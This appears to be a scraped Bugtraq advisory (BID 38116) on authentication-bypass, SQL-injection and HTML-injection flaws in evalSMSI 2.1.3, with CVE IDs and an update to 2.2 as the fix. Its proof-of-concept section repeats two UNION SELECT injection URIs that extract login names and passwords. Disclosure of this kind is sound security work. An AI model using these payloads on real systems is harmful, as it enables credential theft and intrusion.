evalSMSI Multiple Input Validation Vulnerabilities
BID:38116
Info
evalSMSI Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 38116 |
| Class: | Input Validation Error |
| CVE: |
CVE-2010-0616 CVE-2010-0615 CVE-2010-0614 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 05 2010 12:00AM |
| Updated: | Apr 13 2015 09:02PM |
| Credit: | ekse |
| Vulnerable: |
evalSMSI evalSMSI 2.1.3 |
| Not Vulnerable: |
evalSMSI evalSMSI 2.2 |
Discussion
evalSMSI Multiple Input Validation Vulnerabilities
evalSMSI is prone to multiple vulnerabilities, including an authentication-bypass issue, an SQL-Injection issue, and an HTML-Injection issue.
Attackers can exploit these issues to gain administrative access to the affected application, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Versions prior to evalSMSI 2.2.00 are vulnerable.
evalSMSI is prone to multiple vulnerabilities, including an authentication-bypass issue, an SQL-Injection issue, and an HTML-Injection issue.
Attackers can exploit these issues to gain administrative access to the affected application, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Versions prior to evalSMSI 2.2.00 are vulnerable.
Exploit / POC
evalSMSI Multiple Input Validation Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20login,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
http://www.example.com/evalsmsi/ajax.php?action=question&query=1%22%20UNION%20SELECT%20NULL%20,%20password,%20NULL,%20NULL,%20NULL%20FROM%20authentification%20UNION%20SELECT%20NULL%20,%20NULL,%20NULL,%20NULL,%20%22
Solution / Fix
evalSMSI Multiple Input Validation Vulnerabilities
Solution:
The vendor has released an update. Please see the references for details
evalSMSI evalSMSI 2.1.3
Solution:
The vendor has released an update. Please see the references for details
evalSMSI evalSMSI 2.1.3
-
evalSMSI evalsmsi_2.2.00.tar.gz
http://downloads.sourceforge.net/project/evalsmsi/evalsmsi_2.2.00.tar. gz
References
evalSMSI Multiple Input Validation Vulnerabilities
References:
References:
- evalSMSI Homepage (evalSMSI)
- CORELAN-10-008 - Multiple vulnerabilities found in evalmsi 2.1.03 (Peter Van Eeckhoutte
)